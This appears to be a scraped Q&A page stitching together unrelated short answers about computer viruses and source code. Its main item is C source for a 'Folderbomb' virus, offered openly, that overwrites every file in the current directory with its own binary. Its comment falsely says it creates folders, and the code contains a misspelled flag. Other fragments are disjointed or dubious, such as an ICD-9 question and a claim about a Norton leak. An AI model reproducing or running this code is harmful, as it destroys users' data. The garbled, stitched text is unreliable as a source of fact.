If you're talking about viruses on your computer, No you cannot.
Viruses are executables. The code in them is binary code- Machine language. You can't open it and expect to see the C code.
There are many kinds of viruses. Anything which is harmful and/or self-propagating can be considered a virus and there are numerous ways on how to write the same program.
/*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own responsibility*/
void main(int argc,char* argv[])
{ char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf("-------------------------"); printf("\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n"); cprintf("-------------------------"); done = findfirst("*.*",&ffblk,0); while (!done) { printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Folderbomb"); source=open(argv[0],O_RDONLY|O_BINARY); target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0) write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); }
Source code comes from the programmer...
you can get lots of source code from 1000projects.com in diff languages....
It is the source code on Unix Level 6.
It coverts your source code into machine code so the computer can execute it.
In one of two conditions:public domain code - anyone can do anything they want with this sourceopen source code - this source is legally copyrighted, but distributed with a licence controlling how you can modify and redistribute
In Iran?
learn HTML source code and read the source code of the website before going on it, or get avg and it scans the website before you go on it
A DS virus code is a virus in the ds
It is near impossible for a virus to be in the game. To put a virus into the game network, a hacker needs to hack the core system server and modify the entire game connection behavior to insert the virus source code into the game
Norton is not dat much popular now because of the source code leak so may be you can get virus
Virus Signature
What is ICD 9 code for BK virus
A virus is code, programming code or scripts, so yes, it is software
Yes, it exists....The ILOVEYOU virus is a destructive virus/worm created in VBscript created to target Microsoft based systems via email or IRC and creates loss of data on ones HDD (Hard Drive).Note: I will only provide selected parts of the source code and not the full code for security reasons.
Stores the virus' program code that tells how to do everything the virus needs to do.
virus signatures
It can be but source code is just the code of a webpage. Whatever format it is.